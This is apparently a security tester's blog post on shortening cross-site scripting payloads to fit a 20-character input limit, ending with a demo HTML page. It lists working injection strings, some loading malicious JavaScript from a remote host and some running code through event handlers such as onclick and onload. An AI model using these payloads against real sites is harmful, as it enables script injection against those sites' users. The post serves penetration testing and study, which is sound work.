In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.
My go to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.
This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:
- If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g.
<script src='//btoe.ws/xss.js'></script> - If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg.
<script src='evil.js'></script> - If you are including a JavaScript file from another domain, there is no reason why its extension must be
.js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg.<script src='http://btoe.ws'> - If you are using IE you don’t need to close the
<script>tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g.<script src='http://btoe.ws/evil.js'> - You don’t need quotes around your
srcattribute. Eg.<script src=http://btoe.ws/evil.js></script>
In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. Thats still pretty short, but we are back over my 20 character limit.
Time to give up? I think not.
Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:
- You can make up your own tags! E.g.
<x onclick="alert(1)">foo</x> - If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g.
<x onclick='alert(1)'>. - You don’t need to wrap your code in quotes. Eg.
<b onclick=alert(1)>foo</b> - If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as
function a(){alert(1)}you can simply do<b onclick='a()'>foo</b> - While
onclickandonkeyupare short when used with<b>or a custom tag, they aren’t going to fire without user interaction. Theonloadevent of the<body>tag on the other hand will. I think that having duplicate<body>tags might not work on all browsers, though. E.g.<body onload='alert(1)'>
Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at 14 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.
This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticable and would prove your point.
This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.
If you want to see some of these in action, copy the following into a file and open it in your your browser or go to http://btoe.ws/shrtxss.html.
Edit: albinowax points out that onblur is shorter than onclick or onkeyup.
<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>
<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->
<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>
PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.
